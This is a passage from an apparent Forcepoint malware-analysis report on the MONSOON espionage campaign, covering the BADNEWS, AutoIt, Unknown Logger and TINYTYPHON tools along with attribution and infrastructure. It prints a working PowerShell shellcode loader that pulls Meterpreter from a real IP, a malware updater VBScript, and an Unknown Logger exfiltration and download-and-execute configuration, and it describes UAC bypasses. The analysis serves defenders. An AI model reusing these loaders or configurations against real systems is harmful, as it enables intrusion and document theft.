|hcmd|Execute a command via cmd.exe and send the output to the C&C|
|{{|Use the new C&C server address specified between {{ and }} in the content (e.g. {{MmVhZGFkMmQ2NGM2YzZjZGNkY2RlNjZmYWUwZjJlZTY0ZmNlOGVjNjZmYWUwZjJlZTY4ZjJjOGYyMw==}})|
|ok|Do nothing|

Figure 24 – BADNEWS Command Set

The malware will send back an acknowledgment response for most of these commands, along with any additional data from the command that has been executed.
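To put the "{{" channel scraping, the ROR/XOR encoding and the "tag:parameter" command format together, here is an added Python 3 helper, written for this edit rather than taken from Forcepoint's script, that decrypts a BADNEWS token, pulls hidden C&C addresses out of blog, feed or forum page content, and splits a command response into its tag and decrypted parameter. The two tokens are the ones quoted in this report; the forum snippet is constructed.

```python
from __future__ import annotations
import base64
import re

XOR_KEY = 0x23      # per-byte XOR constant from the report
ROTATE_BITS = 3     # encryption is ROR 3 then XOR 0x23; decryption reverses both

# The two encrypted tokens quoted in this report (decoder example and Figure 24).
GATE_TOKEN = ("MmVhZGFkMmQ2NGM2YzY4NWU2NjU4NWE1ZTYwNDI0ZTZlNTI0YzY4ZWFk"
              "NmMyZGVlNGZjZGM2Y2YwZmFkOGZlNjJkMmUyZDIz==")
SWITCH_TOKEN = ("MmVhZGFkMmQ2NGM2YzZjZGNkY2RlNjZmYWUwZjJlZTY0ZmNlOGVjNjZm"
                "YWUwZjJlZTY4ZjJjOGYyMw==")

# Constructed forum-comment snippet (not from the report) mirroring the
# white-on-white hiding technique described above; it carries SWITCH_TOKEN
# wrapped across a line the way HTML extraction often leaves it.
SAMPLE_CHANNEL_PAGE = (
    "<p>Great article, thanks for sharing!</p>\n"
    '<span style="color:#ffffff;background:#ffffff">{{'
    "MmVhZGFkMmQ2NGM2YzZjZGNkY2RlNjZmYWUwZjJlZTY0ZmNlOGVjNjZmYWUwZ\n"
    "jJlZTY4ZjJjOGYyMw==}}</span>\n"
)


def _rol8(value: int, bits: int) -> int:
    """Rotate an 8-bit value left by `bits`."""
    bits %= 8
    return ((value << bits) | (value >> (8 - bits))) & 0xFF


def _normalise_b64(token: str) -> str:
    """Observed tokens carry superfluous '==' after an already complete
    base64 string; strip all padding and re-pad canonically."""
    token = token.strip().rstrip("=")
    return token + "=" * (-len(token) % 4)


def badnews_decrypt(token: str) -> str:
    """Reverse the BADNEWS C&C encoding: base64 -> hex text -> bytes, then
    XOR 0x23 and ROL 3 per byte. The encrypted 0x23 at the end decrypts to a
    NUL terminator, which is dropped."""
    hex_text = base64.b64decode(_normalise_b64(token)).decode("ascii")
    raw = bytes.fromhex(hex_text)
    plain = bytes(_rol8(b ^ XOR_KEY, ROTATE_BITS) for b in raw)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


C2_MARKER = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)


def extract_c2_from_channel(page_content: str) -> list[str]:
    """Return every C&C address hidden between '{{' and '}}' in channel page
    content, decrypted. Whitespace inside the marker is ignored; content that
    does not decrypt (like the corrupted channels in the sample) is skipped."""
    addresses = []
    for match in C2_MARKER.finditer(page_content):
        token = re.sub(r"\s+", "", match.group(1))
        try:
            addresses.append(badnews_decrypt(token))
        except ValueError:          # bad base64, non-hex text or undecodable bytes
            continue
    return addresses


def parse_command(response: str) -> tuple[str, str | None]:
    """Split a C&C response into (tag, decrypted parameter). A '{{...}}'
    response switches the C&C server; tags such as 'ok' carry no parameter."""
    response = response.strip()
    if response.startswith("{{"):
        found = extract_c2_from_channel(response)
        return ("{{", found[0] if found else None)
    tag, sep, param = response.partition(":")
    if not sep or not param:
        return (tag, None)
    return (tag, badnews_decrypt(param))


if __name__ == "__main__":
    print(badnews_decrypt(GATE_TOKEN))
    print(extract_c2_from_channel(SAMPLE_CHANNEL_PAGE))
    print(parse_command("link:" + GATE_TOKEN))
```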
**Keylogger.** When BADNEWS first starts, it will spawn a new thread to log keystrokes to a file. The header of the file contains the marker "KLTNM:" and the system language. The rest of the file contains information about the active window and the keys pressed:

```
KLTNM: 崐ခခ00000409
2016/06/01 09:42:18 - {Window Name}
[SHIFT]c[SHIFT];
```

The malware will only send the keylog file to the C&C when instructed to by the "kl" command.

**Document Crawler.** When BADNEWS first starts, it will spawn a new thread to check all local and mapped drives for document files with the following extensions:

- doc
- docx
- pdf
- ppt
- pptx
- txt

Any documents under 15MB will be copied to the user's _%temp%\SMB\_ folder. The malware will only send these documents to the C&C when instructed to by the "ustr" command.
**Window Message Processor.** BADNEWS will also check for any new hard-drives that are added to the machine, such as USB devices. It does this in an interesting way, by creating a window and listening for the WM_DEVICECHANGE window message:

```
LRESULT CALLBACK WndProc(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
    // Window message 23 is defined by the malware as a code to disable the document crawler
    if ( Msg > WM_QUERYENDSESSION )
    {
        if ( Msg == WM_ENDSESSION )
            return 23;
        // Has a new device been added to the machine? If so, try to find documents
        if ( Msg == WM_DEVICECHANGE )
            CrawlDrivesForDocuments();
    }
    else
    {
        switch ( Msg )
        {
            case WM_QUERYENDSESSION:
                return 23;
            case WM_CREATE:
                return 0;
            case WM_DESTROY:
                return 23;
        }
    }
    return DefWindowProcW(hWnd, Msg, wParam, lParam);
}
```

Figure 25 – Device Change Listener

**Updater VBScript.** The "upd" command downloads a new version of the malware to %temp%\up.exe and then updates the malware (jli.dll) via the following VBScript:

```
Set oShell = CreateObject ("WScript.Shell")
Dim strArgs,dest,file,demofile,filesys,appdata,wshSystemEnv
dest="MicroScMgmt.exe "
dest1="jli.dll"
WScript.sleep 8000
strArgs = "cmd /c move /Y %temp%\up.exe ""%appdata%""\Microsoft\"+dest1
oShell.Run strArgs, 0, true
Set filesys = CreateObject ("Scripting.FileSystemObject")
wshSystemEnv = oShell.ExpandEnvironmentStrings( "%APPDATA%" )
appdata = wshSystemEnv & "\ss.vbs"
set demofile = filesys.GetFile(appdata)
demofile.Delete
strArgs= "cmd /c """+ wshSystemEnv +"\Microsoft\"+dest+""""
oShell.Run strArgs, 0, false
```

Figure 26 – Updater VBScript

#### AUTOIT BACKDOOR

The majority of the weaponised documents used in MONSOON are PPS files which exploit CVE-2014-6352 and drop an AutoIt binary.
The AutoIt script contained within the binary contains a host of features, including:

- Sending off system information
- Executing arbitrary commands
- Updating itself
- Escalating privileges (bypassing UAC [7])
- Exfiltrating documents found on the system
- Executing secondary PowerShell-based malware
- Executing second stage "custom" malware
- Stealing Chrome passwords
- Identifying whether 360 Total Security anti-virus is running

**Decompiled AutoIt Script.** A fully decompiled version of this AutoIt backdoor was generated by the Special Investigations Team in Forcepoint Security Labs™.

**Document Exfiltration.** The AutoIt backdoor is capable of finding and uploading documents with the following extensions:

```
*.doc;*.pdf;*.csv;*.ppt;*.docx;*.pst;*.xls;*.xlsx;*.pptx;*.jpeg
```

These will then be uploaded to /update-request.php on the C&C.

Figure 27 – Upload via PHP Script

**Privilege Escalation.** The backdoor will attempt to escalate privileges by bypassing Windows User Account Control (UAC) using one of two well-known techniques[13]:

If the user's operating system is 64-bit, then the malware will use the Windows Update Standalone Installer (WUSA) to copy its DLL into a protected folder (C:\Windows\System32\oobe) with the name wdscore.dll. It will then execute oobe.exe, which will side-load the malicious wdscore.dll instead of the one from the system directory.

If the user is on a 32-bit system, then the malware will use the CallWindowProcW API to jump into some shellcode that will inject the UAC bypass executable into Svchost.exe. Firstly, the legitimate Windows "Computer Management.lnk" file is overwritten with a new version using Leo Davidson's IFileOperation[14] code. This links to the original malware executable.
Secondly, the malware will execute CompMgmtLauncher.exe, which in turn will execute the copied shortcut as an elevated process.

13 https://www.pretentiousname.com/misc/win7_uac_whitelist2.html
14 https://msdn.microsoft.com/en-us/library/bb775771(VS.85).aspx

**PowerShell Second Stage & Metasploit Meterpreter.** The AutoIt backdoor will send heartbeats to its C&C at /dropper.php and receive back commands. During our analysis, we saw that the C&C 212[.]129[.]13[.]110 was serving a base64 encoded response to the heartbeat requests:

Figure 28 – Base64 Response

This response contains the command ID and the parameter. In this case the command ID is 2, which tells the AutoIt backdoor to execute the base64 encoded blob under PowerShell.

The PowerShell script eventually decodes to a typical shellcode loader, which has been cleaned up and beautified:

```
$c = ''
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);

$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]] $sc = 0xfc,0xe8,0x86,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31...**snip**...
$size = 0x1000;
if ($sc.Length -gt 0x1000){ $size = $sc.Length };
$x=$w::VirtualAlloc(0,0x1000,$size,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) { $w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) };
$w::CreateThread(0,0,$x,0,0,0);
for (;;){ Start-sleep 60 };
```

Figure 29 – Beautified PowerShell

The shellcode will dynamically resolve APIs and attempt to download a malware component from hxxps://45[.]43[.]192[.]172:8443/OxGN.

Figure 30 – Hard Coded IP Address

The payload received from this was yet more shellcode and what appeared to be encrypted binary data. This secondary shellcode changed each time we requested it from the C&C, because it was being dynamically built with a different encryption (XOR) key:

Figure 31 – Encrypted Shellcode

Once decrypted, the data appears to be a PE file, but contains code within the header.

Figure 32 – Decrypted PE File

It finally calls code to manually load and relocate the decrypted executable into a new region of memory, and then jumps to the original entry point. It turned out that the decrypted executable here was actually Metasploit's Meterpreter, which spawned a reverse TCP shell back to the C&C at hxxps://45[.]43[.]192[.]172:8443. During our analysis the following commands from the Meterpreter server were received:

- stdapi_sys_config_getuid
- stdapi_sys_config_sysinfo
- stdapi_net_config_get_interfaces
- stdapi_net_config_get_routes

No further commands were received after this.

#### UNKNOWN LOGGER PUBLIC V 1.5

Unknown Logger is another malware component used in MONSOON. It is a publicly released, free backdoor. It is capable of credential theft from browsers, keylogging, taking screenshots, spreading itself laterally, and downloading second stage malware.

In 2012, a user named "The Unknown" publicly released a free version of a credential stealing worm on hackforums[.net] called "Unknown Logger Public". The actors have been using version 1.5 of this malware in some of their weaponised documents. It is likely that they simply downloaded and built their own version from the publicly available version 1.5 on Hackforums.

Figure 33 – Unknown Logger Server Configuration Panel

Unknown Logger is dropped by at least two[15] of the weaponised documents analysed. Both of these documents exploit CVE-2014-6352.

15 SHA1: 824013c9d8b2aab1396c4a50579f8bd4bf80abdb
   SHA1: e27d3cfc9141f618c5a8c075e7d18af11a012710

Figure 34 – Unknown Logger – Settings Panel

Unknown Logger's main purpose is to record keystrokes and steal usernames and passwords saved by browsers on the local machine. This information is then sent to a pre-defined FTP or SMTP server with a username and password specified by the actor when building the malware.
It can also spread itself into RAR files, USB devices and network shares. Interestingly, it does not have the ability for C&C communication. It cannot execute arbitrary commands or receive a command indicating what it should do next.

```
Features:
1- Built in Stub
2- Get Tons of Information about the slave (Computer User, Computer Name, Computer Total Physical Memory, slave's IP Address, slave's Country, Date, etc...)
3- Send logs to SMTP Severs and FTP
4- SMTP (Hotmail, Gmail, AOL, Yahoo)
5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo)
6- Test FTP Functionality
7- Continuously Send Logs without Fail
8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you)
9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers Symbols - Specific Keys ([F1], [F2], [Home], etc...))
10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit)
11- Hide Functionality (Make the Server Invisible to the Naked eye)
12- Never Crashes in slave's Computer (Will always be working whatever happens)
13- Simple and Easy to use GUI
14- Customer Server Name
15- Sends Clean and Very Organized Logs
16- Can be Used as a Keylogger - Stealer - Worm Spreader and more by just Checking Few Boxes

Spreaders:
1- USB Spreader
2- LAN Spreader
3- P2P Spreader
4- RAR Spreader

Stealers:
1- Firefox 4/5/6/7/8/9
2- Google Chrome All Versions
3- Opera All Versions
4- Internet Explorer 7/9
5- Steam Stealer
6- CD Keys (up to 300)

Anti Killers:
1- Anti Nod32 (All Versions)
2- Anti Kaspersky (All Versions)
3- Anti BitDefender (All Versions)
4- Anti MalwareBytes (All Versions)
5- Anti Norman (All Versions)
6- Anti WireShark (All Versions)
7- Anti Anubis (All Versions)
8- Anti KeyScrambler (All Versions)
9- Anti Ollydbg (All Versions)
10- Anti Outpost (All Versions)
11- Anti ZoneAlaram (All Versions)

Disablers:
1- Disable RUN
2- Disable Registry
3- Disable CMD
4- Disable Right Click
5- Disable Task Manager
6- Disable System Restore

Deleters:
1- Delete FireFox Cookies
2- Delete Google Chrome Cookies
3- Delete Internet Explorer Cookies

Download And Execute:
Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously

Webpage Loader:
Add any Link and it will be Automatically Loaded on the slave's PC
```

**Configuration.** In the samples analysed[16], Unknown Logger was configured to download the AutoIt backdoor upon start-up. One of the configurations was as follows:
|Setting|Value|
|---|---|
|Username|chinastratforum@gmail.com|
|Password|**redacted**|
|SmtpServer|smtp.gmail.com|
|FTPServer|ftp://www.example.com/example.txt|
|SmtpPort|587|
|UseSmtp|True|
|UseFTP|False|
|ExfilIntervalMinutes|1|
|ScreenshotEmailRecipient|c**redacted**@gmail.com|
|USBSpreader|True|
|CreateNetworkShare|True|
|RARSpreader|True|
|P2PSpreader|True|
|FirefoxStealer|True|
|OperaStealer|False|
|ChromeStealer|True|
|IEStealer|False|
|SteamStealer|False|
|CDKeysStealer|False|
|DeleteCookies|False|
|DeleteChromeCookies|False|
|DeleteFirefoxSignons|False|
|RunRegistryKey|False|
|Screenshots|True|
|ScreenshotIntervalMinutes|1|
|FakeAlert|False|
|FakeAlertText||
|AlertType||
|AntiKeyScrambler|True|
|AntiWireshark|True|
|AntiAnubis|True|
|AntiMalwarebytes|True|
|AntiKaspersky|True|
|AntiOllydbg|True|
|AntiOutpost|True|
|AntiNorman|True|
|AntiBitdefender|True|
|AntiNOD32|True|
|AntiZoneAlarm|True|
|Keylogger|True|
|NoRun|False|
|NoRegedit|False|
|NoCMD|False|
|NoViewContextMenu|False|
|NoTaskMgr|False|
|NoSystemRestore|False|
|LaunchProcess|False|
|LaunchProcessString|http://|
|DownloadExecFile|True|
|DownloadExecFileURL|http://newsnstat.com/nregsrv2.exe|
|Melt|False|

Figure 35 – Unknown Logger Configuration

16 SHA1: c691c07191963ca3db28235d0a38060b2b9ea8f2
   SHA1: 6e85333e5ee05c40bee0457419aa68a007a0e5f5

The settings have been named as part of the investigation, as they are not specifically named in the malware. The "DownloadExecFileURL" specifies a URL to grab an additional file from and execute at runtime. Analysis found that nregsrv2.exe is the same AutoIt trojan dropped by many of the other weaponised documents used in this campaign.

#### TINYTYPHON

The TINYTYPHON malware is a small backdoor capable of finding and uploading documents on locally mapped drives and receiving secondary malware. It is dropped by at least one of the weaponised documents[17] used in the MONSOON campaign, where it is embedded inside another executable. The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents.

**Configuration & Persistence.** TINYTYPHON contains a small configuration appended to the end of the executable. In the sample analysed[18] this configuration was XORed with the hexadecimal value 0x90.

17 SHA1: 9cdbb41f83854ea4827c83ad9809ed0210566fbc
18 SHA1: fcf8e5cf1207fdfab9bcb0a4dc45ad188089655a

Figure 36 – XOR 0x90 Data

The configuration contains the C&C address and paths to use, as well as a list of document extensions to check when crawling local drives. It also contains the filename to copy itself to in the local system32 directory, and the name of the persistence registry key to install itself under _HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run_.

**Document Crawler.** TINYTYPHON constantly searches for and uploads documents on the local machine. It will first search for any documents on the drive containing the operating system, and then it will search through all drive letters C through to Z.
Figure 37 – Document Crawler

Once a document is found matching one of the extensions in the configuration, the document is uploaded to the C&C.

Figure 38 – Document Upload to C&C

**Victims.** The TINYTYPHON C&C from the sample we analysed contained a /http directory which had an open directory listing:

Figure 39 – C&C Web Server /http listing

The /upload directory contained several folders relating to different victims:

Figure 40 – C&C Web Server /http/upload listing

Each of these folders contained the documents found and uploaded by TINYTYPHON on the victim's machine.

Figure 41 – C&C Web Server /http/upload/ listing

The filenames begin with the MD5 hash of the file, then a dash, and then the original filename. There were thousands of documents which had been exfiltrated to this C&C. After reviewing the filenames of documents from several of the victims, it appears that most of the victims are involved with government agencies. Some of these documents contain highly sensitive information such as clearance documents, financial information, and technical specifications.

During the investigation, the server stopped responding on June 8, 2016 and then came back online on July 5, 2016. It is unknown why this month-long outage occurred, although it could have been because the group knew that people were accessing the open directories and wanted to remain undetected.

## ATTRIBUTION

With respect to attribution, Forcepoint Security Labs focuses on enabling the awareness and understanding of intent. This is useful in order to identify likely future behaviour.
Reports from Special Investigations do not focus on specific attribution.

#### VICTIMS

The MONSOON victims fit with a group who have military and political interests in the Indian Subcontinent. Many of the victims are located in surrounding countries, including Bangladesh, Sri Lanka and Pakistan. But victims also originate from further afield, including Africa and the Far East.

The targeting of Chinese nationals may also be related to this campaign, but equally may be part of a separate campaign by the adversary, or even part of them selling Surveillance-As-A-Service in a similar manner to that previously seen with the HANGOVER group [2].

#### ADVERSARIES

It was possible to identify an individual from a domain registration record who is believed to be associated with MONSOON. There is a highly probable level of confidence in this association due to the following reasons:

- The domain name registered is a variant of one of the most popular domains used in MONSOON
- The person who registered the domain lives or has lived and works in India
- The person who registered the domain has profiles on coding challenge and freelance coder websites. The HANGOVER group are thought to use freelance coders.

From the information available, it was possible to identify this individual's Facebook and LinkedIn accounts. However, it is not deemed in the public interest to publish specific details on this individual. Relevant authorities are informed as and when appropriate.

**Cui Bono?** A useful analysis viewpoint is to ask the legal question: Cui Bono? Or: "who profits?" Even though this report does not attempt to focus on specific attribution, asking "What is to be gained from these actions, or what needs are satisfied?" may offer some insight. Any further analysis is left as an exercise for the reader.
From the documents known to have been exfiltrated, a number of recurring themes occur:

- Army training, personnel and payroll records
- Defence attachés and consulates
- Defence research
- Foreign high commissions
- Military exercises
- Military air platforms
- Military naval platforms
- Military logistic records
- Naval coastal protection
- Anti-torpedo and naval electronic countermeasure (ECM) systems
- Submarine communication systems
- Nuclear security and counter-proliferation
- United Nations
- Personal details including medical records, driving licence, passport and visas
- Accounting records
- Travel and itinerary details

#### INFRASTRUCTURE

By integrating the findings with prior research [1] [8], it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections. The original HANGOVER infrastructure overlaps with unique passive DNS records and is further linked by the use of a specific SOA RNAME record. An example of this connection is illustrated below.

Figure 42 – Connection Topology

Both of the IPs that link this infrastructure appear to be unique to the HANGOVER group. The _newsnstat[.com]_ domain was used earlier in 2015 for previous HANGOVER campaigns, and was then repurposed in December 2015 for the MONSOON campaign.

## INDICATORS OF COMPROMISE

A list of IOCs for MONSOON can be found below. This is not a comprehensive list; it is focused on the specific documents and malware that were analysed for the purpose of this report.
#### NAMES OF LURE & WEAPONISED FILES

Below are the most common filenames used as lures. The distribution of words was used to generate the word cloud.

## ABOUT US

Special Investigations is part of Forcepoint Security Intelligence, itself an integral part of Forcepoint Security Labs. It exists to provide the security insights, technologies, and expertise that allow customers to focus on their own core business rather than on security.

Special Investigations is made up of talented malware reverse engineers and malware analysts. They are responsible for delivering high-quality output as part of their investigations into botnets, APTs, and other deep reverse engineering topics. Special Investigations works with national and international crime agencies, national CERTs and trusted partners.

The team works closely with other parts of Forcepoint Security Labs, as well as other areas of the Forcepoint business. They strive to enable and deliver insight and a deep understanding of emerging cyber threats. They are able to communicate this to a broad set of stakeholders, including customers, partners and the general public, with the objective of offering tangible decision advantage.

## FIGURES

Figure 1 – Word-Cloud of Lure Document Titles (p. 1)
Figure 2 – Cyber_Crime_Bill.doc (Excerpt) (p. 6)
Figure 3 – EXIF info for Cyber_Crime_Bill.docx (p. 7)
Figure 4 – Search VT by Author Metadata (p. 7)
Figure 5 – Lure Document Cover (p. 8)
Figure 6 – Lures from 37.58.60.195 (p. 8)
Figure 7 – URLQuery.net (p. 9)
Figure 8 – Known Bad Email Lure (p. 10)
Figure 9 – YMLP Lures (p. 11)
Figure 10 – China Strat Screen Shot (p. 12)
Figure 11 – Lure Google+ Screen Shot (p. 13)
Figure 12 – Lure Facebook Screen Shot (p. 14)
Figure 13 – Lure Twitter Screen Shot (p. 15)
Figure 14 – Exploited CVEs (p. 16)
Figure 15 – Binary Blob Dropped to %temp% (p. 17)
Figure 16 – VB Extract of Blob (p. 17)
Figure 17 – VB Decryption of Embedded Files (p. 18)
Figure 18 – PHP Redirect (p. 20)
Figure 19 – Silverlight Profiling (p. 21)
Figure 20 – Windows Registry Keys (p. 22)
Figure 21 – GitHub Command Channel (p. 24)
Figure 22 – Chinasmack[.com] Command Channel (p. 24)
Figure 23 – Forum Command Channel (p. 25)
Figure 24 – BADNEWS Command Set (p. 28)
Figure 25 – Device Change Listener (p. 29)
Figure 26 – Updater VBScript (p. 30)
Figure 27 – Upload via PHP Script (p. 31)
Figure 28 – Base64 Response (p. 32)
Figure 29 – Beautified PowerShell (p. 33)
Figure 30 – Hard Coded IP Address (p. 34)
Figure 31 – Encrypted Shellcode (p. 35)
Figure 32 – Decrypted PE File (p. 36)
Figure 33 – Unknown Logger Server Configuration Panel (p. 37)
Figure 34 – Unknown Logger – Settings Panel (p. 38)
Figure 35 – Unknown Logger Configuration (p. 41)
Figure 36 – XOR 0x90 Data (p. 42)
Figure 37 – Document Crawler (p. 43)
Figure 38 – Document Upload to C&C (p. 44)
Figure 39 – C&C Web Server /http listing (p. 44)
Figure 40 – C&C Web Server /http/upload listing (p. 45)
Figure 41 – C&C Web Server /http/upload/ listing (p. 46)
Figure 42 – Connection Topology (p. 48)

## REFERENCES

[1] S. Fagerland, "The Hangover Report," Blue Coat, 20 May 2013. [Online]. Available: https://www.bluecoat.com/security-blog/2013-05-20/hangover-report. [Accessed May 2016].
[2] S. Fagerland, M. Kråkvik, J. Camp and N. Moran, "Operation Hangover: Unveiling an Indian Cyberattack Infrastructure," Norman AS, May 2013. [Online]. Available: http://enterprisemanage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf. [Accessed May 2016].
[3] "AutoIt," [Online]. Available: https://www.autoitscript.com/site/autoit/. [Accessed June 2016].
[4] "Patchwork – Targeted Attack (APT)," Cymmetria, 7 July 2016. [Online]. Available: https://www.cymmetria.com/patchwork-targeted-attack/. [Accessed July 2016].
[5] "Microsoft Office Memory Errors Let Remote Users Execute Arbitrary Code and Input Validation Flaw Permits Cross-Site Scripting Attacks," February 2015. [Online]. Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1641. [Accessed July 2016].
[6] "Cyberthreats GitHub: MyDoom Malware Source Code," [Online]. Available: https://github.com/cyberthreats/malware-source-mydoom. [Accessed February 2016].
[7] "Leo Davidson & hfiref0x's UAC bypass Method," March 2015. [Online]. Available: https://github.com/hfiref0x/UACME/blob/master/Source/Akagi/pitou.c. [Accessed July 2016].
[8] J.-I. Boutin, "Targeted information stealing attacks in South Asia use email, signed binaries," ESET, 16 May 2013. [Online]. Available: http://www.welivesecurity.com/2013/05/16/targetedthreat-pakistan-india/. [Accessed Aug 2016].